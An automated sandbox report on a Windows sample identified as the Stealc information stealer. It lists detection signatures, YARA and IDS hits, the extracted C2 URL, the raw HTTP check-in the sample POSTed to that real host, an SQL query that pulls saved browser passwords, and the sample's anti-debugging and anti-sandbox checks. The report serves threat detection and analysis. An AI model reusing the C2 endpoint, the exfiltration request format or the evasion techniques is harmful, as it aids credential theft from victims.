
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1543417
MD5: 87f5c5f97ee636b82e53d3f3acb6ed2b
SHA1: 3aeeb3e7a4ca578ffbbe685c88ae689f141ee68d
SHA256: 0de3e0a7d01986ca6a969204c0dfb41fc50e24c992694ee629508e913643246c
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 6316 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 87F5C5F97EE636B82E53D3F3ACB6ED2B)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}
Yara matches: PCAP
Source | Rule | Description | Author
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security

Yara matches: memory dumps
Source | Rule | Description | Author
00000000.00000003.1704510962.0000000005610000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000002.1753243458.000000000189E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
Process Memory Space: file.exe PID: 6316 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
Process Memory Space: file.exe PID: 6316 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security

Yara matches: unpacked PEs
Source | Rule | Description | Author
0.2.file.exe.bd0000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
No Sigma rule has matched

Suricata IDS alerts
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-27T20:15:10.393892+0100 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 185.215.113.206 | 80 | TCP


AV Detection

Source: file.exe | Avira: detected
Source: 0.2.file.exe.bd0000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BE9030 CryptBinaryToStringA, GetProcessHeap, RtlAllocateHeap, CryptBinaryToStringA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BDA2B0 CryptUnprotectData, LocalAlloc, LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BD72A0 GetProcessHeap, RtlAllocateHeap, CryptUnprotectData, WideCharToMultiByte, LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BDA210 CryptStringToBinaryA, LocalAlloc, CryptStringToBinaryA, LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BDC920 lstrlen, CryptStringToBinaryA, lstrcat, lstrcat, lstrcat
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Binary string: my_library.pdbU | source: file.exe, 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1704510962.000000000563B000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: my_library.pdb | source: file.exe, file.exe, 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1704510962.000000000563B000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BE40F0 wsprintfA, FindFirstFileA, StrCmpCA, StrCmpCA, lstrcat, lstrcat, lstrcat, lstrcat, lstrcat, lstrcat, FindNextFileA, FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BDE530 FindFirstFileA, StrCmpCA, StrCmpCA, FindNextFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BDF7B0 FindFirstFileA, StrCmpCA, StrCmpCA, StrCmpCA, CopyFileA, DeleteFileA, FindNextFileA, FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BE47C0 GetProcessHeap, RtlAllocateHeap, wsprintfA, FindFirstFileA, StrCmpCA, StrCmpCA, wsprintfA, CopyFileA, DeleteFileA, FindNextFileA, FindClose, lstrcat, lstrcat, lstrlen, lstrlen
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BD1710 FindFirstFileA, StrCmpCA, StrCmpCA, CopyFileA, DeleteFileA, FindNextFileA, FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BDDB80 FindFirstFileA, StrCmpCA, StrCmpCA, StrCmpCA, StrCmpCA, StrCmpCA, StrCmpCA, FindNextFileA, FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BE3B00 wsprintfA, FindFirstFileA, lstrcat, StrCmpCA, StrCmpCA, wsprintfA, PathMatchSpecA, CoInitialize, CoUninitialize, lstrcat, lstrlen, StrCmpCA, wsprintfA, wsprintfA, PathMatchSpecA, wsprintfA, CopyFileA, __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z, DeleteFileA, FindNextFileA, FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BE4B60 wsprintfA, FindFirstFileA, StrCmpCA, StrCmpCA, wsprintfA, StrCmpCA, wsprintfA, wsprintfA, PathMatchSpecA, lstrcat, lstrcat, lstrcat, lstrcat, lstrcat, CopyFileA, DeleteFileA, FindNextFileA, FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BDEE20 wsprintfA, FindFirstFileA, StrCmpCA, StrCmpCA, lstrlen, DeleteFileA, CopyFileA, FindNextFileA, FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BDBE40 FindFirstFileA, StrCmpCA, StrCmpCA, StrCmpCA, StrCmpCA, CopyFileA, DeleteFileA, StrCmpCA, StrCmpCA, StrCmpCA, lstrcat, lstrcat, lstrcat, lstrcat, lstrcat, lstrcat, lstrcat, lstrcat, lstrcat, StrCmpCA, CopyFileA, StrCmpCA, DeleteFileA, StrCmpCA, FindNextFileA, FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BDDF10 FindFirstFileA, StrCmpCA, StrCmpCA, CopyFileA, DeleteFileA, FindNextFileA, FindClose

Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.206:80
Source: Malware configuration extractor | URLs: http://185.215.113.206/6c4adf523b719729.php
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1; Host: 185.215.113.206; Connection: Keep-Alive; Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCFIIIJJKJKFHIDGDBAKHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 43 46 49 49 49 4a 4a 4b 4a 4b 46 48 49 44 47 44 42 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 42 42 45 39 32 42 44 32 46 43 45 32 39 31 34 36 34 38 33 37 34 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 49 49 49 4a 4a 4b 4a 4b 46 48 49 44 47 44 42 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 49 49 49 4a 4a 4b 4a 4b 46 48 49 44 47 44 42 41 4b 2d 2d 0d 0a Data Ascii: ------HCFIIIJJKJKFHIDGDBAKContent-Disposition: form-data; name="hwid"8BBE92BD2FCE2914648374------HCFIIIJJKJKFHIDGDBAKContent-Disposition: form-data; name="build"tale------HCFIIIJJKJKFHIDGDBAK--
Source: Joe Sandbox View | IP Address: 185.215.113.206
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206 (10 occurrences)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BD62D0 InternetOpenA, StrCmpCA, InternetConnectA, HttpOpenRequestA, InternetSetOptionA, HttpSendRequestA, HttpQueryInfoA, InternetReadFile, InternetCloseHandle, InternetCloseHandle, InternetCloseHandle
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1; Host: 185.215.113.206; Connection: Keep-Alive; Cache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCFIIIJJKJKFHIDGDBAKHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 43 46 49 49 49 4a 4a 4b 4a 4b 46 48 49 44 47 44 42 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 42 42 45 39 32 42 44 32 46 43 45 32 39 31 34 36 34 38 33 37 34 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 49 49 49 4a 4a 4b 4a 4b 46 48 49 44 47 44 42 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 49 49 49 4a 4a 4b 4a 4b 46 48 49 44 47 44 42 41 4b 2d 2d 0d 0a Data Ascii: ------HCFIIIJJKJKFHIDGDBAKContent-Disposition: form-data; name="hwid"8BBE92BD2FCE2914648374------HCFIIIJJKJKFHIDGDBAKContent-Disposition: form-data; name="build"tale------HCFIIIJJKJKFHIDGDBAK--
Source: file.exe, 00000000.00000002.1753243458.000000000189E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206
Source: file.exe, 00000000.00000002.1753243458.000000000189E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1753243458.00000000018F7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/
Source: file.exe, 00000000.00000002.1753243458.000000000189E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/$
Source: file.exe, 00000000.00000002.1753243458.00000000018F7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1753243458.00000000018E5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php
Source: file.exe, 00000000.00000002.1753243458.00000000018E5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php-S
Source: file.exe, 00000000.00000002.1753243458.00000000018F7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php.
Source: file.exe, 00000000.00000002.1753243458.00000000018F7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php/
Source: file.exe, 00000000.00000002.1753243458.00000000018E5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpQS
Source: file.exe, 00000000.00000002.1753243458.00000000018F7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/ws
Source: file.exe, file.exe, 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1704510962.000000000563B000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support

System Summary

Source: file.exe | Static PE information: section name: (empty)
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name: (empty)
Source: C:\Users\user\Desktop\file.exe | Code functions (48): 0_2_00C10098, 0_2_01037017, 0_2_00C2B198, 0_2_00C02138, 0_2_00C14288, 0_2_0109A340, 0_2_00C3E258, 0_2_00C4D39E, 0_2_00C5B308, 0_2_00F54476, 0_2_010F15EB, 0_2_00C145A8, 0_2_00C3D5A8, 0_2_010414A6, 0_2_00BF4573, 0_2_00BFE544, 0_2_00C166C8, 0_2_00C596FD, 0_2_00C4A648, 0_2_01035796, 0_2_0103F618, 0_2_00C46799, 0_2_00C2D720, 0_2_00C3F8D6, 0_2_01033965, 0_2_0102E965, 0_2_00C2B8A8, 0_2_00C298B8, 0_2_00C24868, 0_2_00FA181A, 0_2_00F2BAB2, 0_2_01004B94, 0_2_0103DBB6, 0_2_00F20A1C, 0_2_00C40B88, 0_2_00C44BA8, 0_2_0103AD7F, 0_2_00C4AC28, 0_2_00C24DC8, 0_2_00C25DB9, 0_2_00C2BD68, 0_2_00C01D78, 0_2_00C3AD38, 0_2_00C41EE8, 0_2_010E1F91, 0_2_00C18E78, 0_2_00F6EE4B, 0_2_01031E65
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 00BD4610 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: pbjioyes ZLIB complexity 0.9948463417139869
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BE9790 CreateToolhelp32Snapshot, Process32First, Process32Next, StrCmpCA, CloseHandle
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BE3970 CoCreateInstance, MultiByteToWideChar, lstrcpyn
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\4398I723.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe, 00000000.00000002.1753243458.000000000189E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SELECT origin_url, username_value, password_value FROM logins;
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Sections loaded (20): apphelp.dll, winmm.dll, sspicli.dll, wininet.dll, rstrtmgr.dll, ncrypt.dll, ntasn1.dll, iertutil.dll, windows.storage.dll, wldp.dll, profapi.dll, kernel.appcore.dll, ondemandconnroutehelper.dll, winhttp.dll, mswsock.dll, iphlpapi.dll, winnsi.dll, urlmon.dll, srvcli.dll, netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: file.exe | Static file information: File size 2151424 > 1048576
Source: file.exe | Static PE information: Raw size of pbjioyes is bigger than: 0x100000 < 0x1a2400
Source: Binary string: my_library.pdbU | source: file.exe, 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1704510962.000000000563B000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: my_library.pdb | source: file.exe, file.exe, 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1704510962.000000000563B000.00000004.00001000.00020000.00000000.sdmp

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.bd0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;pbjioyes:EW;xrzszivt:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;pbjioyes:EW;xrzszivt:EW;.taggant:EW;
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BE9BB0 GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, LoadLibraryA, LoadLibraryA, LoadLibraryA, LoadLibraryA, LoadLibraryA, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x21a361 should be: 0x21100f
Source: file.exe | Static PE information: section name: (empty)
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name: (empty)
Source: file.exe | Static PE information: section name: pbjioyes
Source: file.exe | Static PE information: section name: xrzszivt
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0109F106 push eax; mov dword ptr [esp], 41F6725Ah (at 0_2_0109F10B)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0109F106 push esi; mov dword ptr [esp], ebp (at 0_2_0109F137)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BFA0F2 push eax; retf (at 0_2_00BFA119)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0114215B push 41279E96h; mov dword ptr [esp], esi (at 0_2_011421B5)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BFA0DC push eax; retf (at 0_2_00BFA0F1)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0112119C push edi; mov dword ptr [esp], 6F7FAF78h (at 0_2_011211BA)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0112119C push ecx; mov dword ptr [esp], 00603025h (at 0_2_011212C4)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EE9019 push edx; mov dword ptr [esp], eax (at 0_2_00EE902C)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EE9019 push edx; mov dword ptr [esp], edi (at 0_2_00EE9036)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EE9019 push ebp; mov dword ptr [esp], 00000000h (at 0_2_00EE904A)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010BC01A push edx; mov dword ptr [esp], ebp (at 0_2_010BC042)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010BC01A push eax; mov dword ptr [esp], ecx (at 0_2_010BC073)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01037017 push 6C5AF0F6h; mov dword ptr [esp], edi (at 0_2_01037020)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01037017 push esi; mov dword ptr [esp], eax (at 0_2_01037029)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01037017 push eax; mov dword ptr [esp], edi (at 0_2_01037054)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01037017 push 184EAD5Ch; mov dword ptr [esp], edi (at 0_2_0103708C)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01037017 push 621BB8DEh; mov dword ptr [esp], eax (at 0_2_0103714E)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01037017 push ecx; mov dword ptr [esp], eax (at 0_2_010371D3)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01037017 push edi; mov dword ptr [esp], edx (at 0_2_010371E7)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01037017 push ecx; mov dword ptr [esp], edi (at 0_2_0103722D)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01037017 push ebx; mov dword ptr [esp], edx (at 0_2_01037328)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01037017 push 55EC382Ah; mov dword ptr [esp], edi (at 0_2_01037336)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01037017 push 43F20C6Ah; mov dword ptr [esp], ebp (at 0_2_0103734F)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01037017 push edi; mov dword ptr [esp], 7FB7553Fh (at 0_2_010373B7)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01037017 push edx; mov dword ptr [esp], ebx (at 0_2_010373F8)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01037017 push eax; mov dword ptr [esp], 423FC3C5h (at 0_2_01037410)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01037017 push edi; mov dword ptr [esp], ecx (at 0_2_01037449)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01037017 push eax; mov dword ptr [esp], ebp (at 0_2_01037504)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01037017 push 2850656Ch; mov dword ptr [esp], eax (at 0_2_0103753B)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01037017 push ebx; mov dword ptr [esp], ecx (at 0_2_0103755C)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01037017 push 3968BA61h; mov dword ptr [esp], ebp (at 0_2_010375A2)
Source: file.exe | Static PE information: section name: pbjioyes entropy: 7.95363539760933

Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BE9BB0 GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, LoadLibraryA, LoadLibraryA, LoadLibraryA, LoadLibraryA, LoadLibraryA, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess | graph_0-36466
                Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
                Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EBD96A second address: EBD96E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EBD96E second address: EBD972 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1045E38 second address: 1045E54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0640D331D3h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1045E54 second address: 1045E5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1045E5A second address: 1045E5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1036B51 second address: 1036B5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F0641384216h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1036B5B second address: 1036B65 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F0640D331C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1036B65 second address: 1036B6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1044EF8 second address: 1044F0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F0640D331C6h 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F0640D331CAh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1047C67 second address: 1047C9E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F0641384216h 0x00000009 jno 00007F0641384216h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 jmp 00007F0641384221h 0x00000018 nop 0x00000019 push 00000000h 0x0000001b or dword ptr [ebp+122D2383h], esi 0x00000021 push ABF0C980h 0x00000026 pushad 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1047C9E second address: 1047CA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1047CA2 second address: 1047CA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1047DB9 second address: 1047DC3 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0640D331C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1047DC3 second address: 1047E1C instructions: 0x00000000 rdtsc 0x00000002 je 00007F0641384218h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jc 00007F0641384216h 0x00000015 popad 0x00000016 pop eax 0x00000017 nop 0x00000018 mov dx, cx 0x0000001b push 00000000h 0x0000001d movsx edi, ax 0x00000020 call 00007F0641384219h 0x00000025 push ebx 0x00000026 pushad 0x00000027 push ecx 0x00000028 pop ecx 0x00000029 jmp 00007F0641384221h 0x0000002e popad 0x0000002f pop ebx 0x00000030 push eax 0x00000031 pushad 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007F0641384223h 0x00000039 rdtsc
